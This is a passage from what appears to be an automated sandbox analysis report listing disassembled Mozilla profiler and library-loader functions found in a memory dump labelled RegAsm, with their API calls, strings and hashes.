                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C10CDC4
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C10CDDA
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C10CDF0
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C10CE06
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C10CE1C
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C10CE32
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C10CE48
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C10CE5E
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C10CE74
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C10CE8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: strcmp
                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                        • API String ID: 1004003707-2809817890
                                                        • Opcode ID: 781712a0c1f08bcded26f13e172bf3cb243f3f59d9949fb145353b06f0be6dac
                                                        • Instruction ID: 2adfda5b1c85b689893649e24579d1f57bd2225a550731f3fe52caeef4444817
                                                        • Opcode Fuzzy Hash: 781712a0c1f08bcded26f13e172bf3cb243f3f59d9949fb145353b06f0be6dac
                                                        • Instruction Fuzzy Hash: 185173E2B4523552FA0031156D34BAA140AEB7325EF10953AED1DA5F80FF08A60ACFF7
                                                        Function 6C0D47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C0D4801
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0D4817
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0D482D
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D484A
                                                          • Part of subcall function 6C0FAB3F: EnterCriticalSection.KERNEL32(6C14E370,?,?,6C0C3527,6C14F6CC,?,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB49
                                                          • Part of subcall function 6C0FAB3F: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C3527,6C14F6CC,?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FAB7C
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0D485F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0D487E
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0D488B
                                                        • free.MOZGLUE(?), ref: 6C0D493A
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D4956
                                                        • free.MOZGLUE(00000000), ref: 6C0D4960
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0D499A
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • free.MOZGLUE(?), ref: 6C0D49C6
                                                        • free.MOZGLUE(?), ref: 6C0D49E9
                                                          • Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
                                                          • Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
                                                          • Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2
                                                        Strings
                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0D47FC
                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C0D4812
                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C0D4828
                                                        • [I %d/%d] profiler_shutdown, xrefs: 6C0D4A06
                                                        • MOZ_PROFILER_SHUTDOWN, xrefs: 6C0D4A42
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                        • API String ID: 1340022502-4194431170
                                                        • Opcode ID: d4e78b429dc6c716f3b21f24b5ed92f67965b4b954f5ae012065d5a01c6dab64
                                                        • Instruction ID: 66fdfd80b5c1df693bfa76e42d71a26c76f3e64995fa5a1ce83a298bc0bf1aa8
                                                        • Opcode Fuzzy Hash: d4e78b429dc6c716f3b21f24b5ed92f67965b4b954f5ae012065d5a01c6dab64
                                                        • Instruction Fuzzy Hash: 0F813674A00200AFDB10EFACC89475E73F1AF4232CF1A4665D92697B41EB31F855CB96
                                                        Function 6C0D19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F760), ref: 6C0D19BD
                                                        • GetCurrentProcess.KERNEL32 ref: 6C0D19E5
                                                        • GetLastError.KERNEL32 ref: 6C0D1A27
                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C0D1A41
                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0D1A4F
                                                        • GetLastError.KERNEL32 ref: 6C0D1A92
                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C0D1AAC
                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0D1ABA
                                                        • LocalFree.KERNEL32(?), ref: 6C0D1C69
                                                        • free.MOZGLUE(?), ref: 6C0D1C8F
                                                        • free.MOZGLUE(?), ref: 6C0D1C9D
                                                        • CloseHandle.KERNEL32(?), ref: 6C0D1CAE
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F760), ref: 6C0D1D52
                                                        • GetLastError.KERNEL32 ref: 6C0D1DA5
                                                        • GetLastError.KERNEL32 ref: 6C0D1DFB
                                                        • GetLastError.KERNEL32 ref: 6C0D1E49
                                                        • GetLastError.KERNEL32 ref: 6C0D1E68
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D1E9B
                                                          • Part of subcall function 6C0D2070: LoadLibraryW.KERNEL32(combase.dll,6C0D1C5F), ref: 6C0D20AE
                                                          • Part of subcall function 6C0D2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0D20CD
                                                          • Part of subcall function 6C0D2070: __Init_thread_footer.LIBCMT ref: 6C0D20E1
                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0D1F15
                                                        • VerSetConditionMask.NTDLL ref: 6C0D1F46
                                                        • VerSetConditionMask.NTDLL ref: 6C0D1F52
                                                        • VerSetConditionMask.NTDLL ref: 6C0D1F59
                                                        • VerSetConditionMask.NTDLL ref: 6C0D1F60
                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0D1F6D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                        • String ID: D
                                                        • API String ID: 290179723-2746444292
                                                        • Opcode ID: 7a4096f16810d8d4701953440f7037b101c08fe454c361ddbdb6124f4f449f9e
                                                        • Instruction ID: 14fc95e26f381e1c3634523db6b493cce24d56eaf78a64afcb470b4e2dbc97f2
                                                        • Opcode Fuzzy Hash: 7a4096f16810d8d4701953440f7037b101c08fe454c361ddbdb6124f4f449f9e
                                                        • Instruction Fuzzy Hash: 1AF18371A00725AFEB209F65CC48B9AB7F4FF49718F114199E909A7640EB74EE80CF90
                                                        Function 6C0D4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0D4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0D44B2,6C14E21C,6C14F7F8), ref: 6C0D473E
                                                          • Part of subcall function 6C0D4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0D474A
                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0D44BA
                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0D44D2
                                                        • InitOnceExecuteOnce.KERNEL32(6C14F80C,6C0CF240,?,?), ref: 6C0D451A
                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0D455C
                                                        • LoadLibraryW.KERNEL32(?), ref: 6C0D4592
                                                        • InitializeCriticalSection.KERNEL32(6C14F770), ref: 6C0D45A2
                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C0D45AA
                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C0D45BB
                                                        • InitOnceExecuteOnce.KERNEL32(6C14F818,6C0CF240,?,?), ref: 6C0D4612
                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0D4636
                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C0D4644
                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0D466D
                                                        • VerSetConditionMask.NTDLL ref: 6C0D469F
                                                        • VerSetConditionMask.NTDLL ref: 6C0D46AB
                                                        • VerSetConditionMask.NTDLL ref: 6C0D46B2
                                                        • VerSetConditionMask.NTDLL ref: 6C0D46B9
                                                        • VerSetConditionMask.NTDLL ref: 6C0D46C0
                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0D46CD
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C0D46F1
                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0D46FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                        • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                        • API String ID: 1702738223-3894940629
                                                        • Opcode ID: 47c7ec4f8b8adebfb18b617fe35610a8479fa6479e321e93dd316c24ccb98264
                                                        • Instruction ID: 805d6e4f3422557c44fd0acd11c88f6b5a589b8ff91a610043a4836aefa6e609
                                                        • Opcode Fuzzy Hash: 47c7ec4f8b8adebfb18b617fe35610a8479fa6479e321e93dd316c24ccb98264
                                                        • Instruction Fuzzy Hash: 916104B0A04344AFEB10AFA0C849F997BF8EF4630CF05C558E518AB741D7B4AA44CF61
                                                        Function 6C10E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C107090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C10B9F1,?), ref: 6C107107
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C10DCF5), ref: 6C10E92D
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EA4F
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EA5C
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EA80
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EA8A
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C10DCF5), ref: 6C10EA92
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EB11
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EB1E
                                                        • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C10EB3C
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EB5B
                                                          • Part of subcall function 6C105710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C10EB71), ref: 6C1057AB
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EBA4
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C10EBAC
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EBC1
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000), ref: 6C10EBCE
                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C10EBE5
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8,00000000), ref: 6C10EC37
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C10EC46
                                                        • CloseHandle.KERNEL32(?), ref: 6C10EC55
                                                        • free.MOZGLUE(00000000), ref: 6C10EC5C
                                                        Strings
                                                        • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C10EA9B
                                                        • [I %d/%d] profiler_start, xrefs: 6C10EBB4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                        • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                        • API String ID: 1341148965-1186885292
                                                        • Opcode ID: bb4c5ded92bf95be75c132c7e62208ddc4c383101cbe8b8eea77551e144656a5
                                                        • Instruction ID: 14baa09e891a8bdf693262f5927ec69ee4e036c1b9b6fb3a33368d350f849af3
                                                        • Opcode Fuzzy Hash: bb4c5ded92bf95be75c132c7e62208ddc4c383101cbe8b8eea77551e144656a5
                                                        • Instruction Fuzzy Hash: BEA14771700604CFCB10AF29C854BAA77B5FF8A31CF18C129E96997B81DF709906CBA1
                                                        Function 6C10F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F70E
                                                        • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C10F8F9
                                                          • Part of subcall function 6C0D6390: GetCurrentThreadId.KERNEL32 ref: 6C0D63D0
                                                          • Part of subcall function 6C0D6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C0D63DF
                                                          • Part of subcall function 6C0D6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C0D640E
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F93A
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F98A
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F990
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F994
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F716
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                          • Part of subcall function 6C0CB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C0CB5E0
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F739
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F746
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F793
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C14385B,00000002,?,?,?,?,?), ref: 6C10F829
                                                        • free.MOZGLUE(?,?,00000000,?), ref: 6C10F84C
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C10F866
                                                        • free.MOZGLUE(?), ref: 6C10FA0C
                                                          • Part of subcall function 6C0D5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D5E8C
                                                          • Part of subcall function 6C0D5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5E9D
                                                          • Part of subcall function 6C0D5E60: GetCurrentThreadId.KERNEL32 ref: 6C0D5EAB
                                                          • Part of subcall function 6C0D5E60: GetCurrentThreadId.KERNEL32 ref: 6C0D5EB8
                                                          • Part of subcall function 6C0D5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5ECF
                                                          • Part of subcall function 6C0D5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C0D5F27
                                                          • Part of subcall function 6C0D5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C0D5F47
                                                          • Part of subcall function 6C0D5E60: GetCurrentProcess.KERNEL32 ref: 6C0D5F53
                                                          • Part of subcall function 6C0D5E60: GetCurrentThread.KERNEL32 ref: 6C0D5F5C
                                                          • Part of subcall function 6C0D5E60: GetCurrentProcess.KERNEL32 ref: 6C0D5F66
                                                          • Part of subcall function 6C0D5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0D5F7E
                                                        • free.MOZGLUE(?), ref: 6C10F9C5
                                                        • free.MOZGLUE(?), ref: 6C10F9DA
                                                        Strings
                                                        • Thread , xrefs: 6C10F789
                                                        • [D %d/%d] profiler_register_thread(%s), xrefs: 6C10F71F
                                                        • " attempted to re-register as ", xrefs: 6C10F858
                                                        • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C10F9A6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                        • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                        • API String ID: 882766088-1834255612
                                                        • Opcode ID: 78b1b2f549570d5c90c2860dd53f26986862969f079389ac8568b2d05053b7ae
                                                        • Instruction ID: 02eca14296dbbf22d11f62c1d3f736ebafb2c540fca73e5f7e8c59c79396ef92
                                                        • Opcode Fuzzy Hash: 78b1b2f549570d5c90c2860dd53f26986862969f079389ac8568b2d05053b7ae
                                                        • Instruction Fuzzy Hash: 1781F075A047049FDB10EF24C840BAEB7E5FFC5308F45896DE8599BB51EB30A849CB92
                                                        Function 6C0D4180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0D4196
                                                        • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0D41F1
                                                        • VerSetConditionMask.NTDLL ref: 6C0D4223
                                                        • VerSetConditionMask.NTDLL ref: 6C0D422A
                                                        • VerSetConditionMask.NTDLL ref: 6C0D4231
                                                        • VerSetConditionMask.NTDLL ref: 6C0D4238
                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0D4245
                                                        • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0D4263
                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C0D427A
                                                        • FreeLibrary.KERNEL32(?), ref: 6C0D4299
                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0D42C4
                                                        • VerSetConditionMask.NTDLL ref: 6C0D42F6
                                                        • VerSetConditionMask.NTDLL ref: 6C0D4302
                                                        • VerSetConditionMask.NTDLL ref: 6C0D4309
                                                        • VerSetConditionMask.NTDLL ref: 6C0D4310
                                                        • VerSetConditionMask.NTDLL ref: 6C0D4317
                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0D4324
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                        • String ID: SetProcessDpiAwareness$Shcore.dll
                                                        • API String ID: 3038791930-999387375
                                                        • Opcode ID: 2357632dd1141bfeefa30106c64a605f36b7e87d04df8a5e4fed3fab62c4d2e5
                                                        • Instruction ID: 16650ffba1fb15a5198d238a7ea4a45f58779629127a94e6194960c77667e622
                                                        • Opcode Fuzzy Hash: 2357632dd1141bfeefa30106c64a605f36b7e87d04df8a5e4fed3fab62c4d2e5
                                                        • Instruction Fuzzy Hash: 5251D571A443146BEB10ABA48C48FBFB7B8DF85758F428518F905A76C0DB74ED508B90
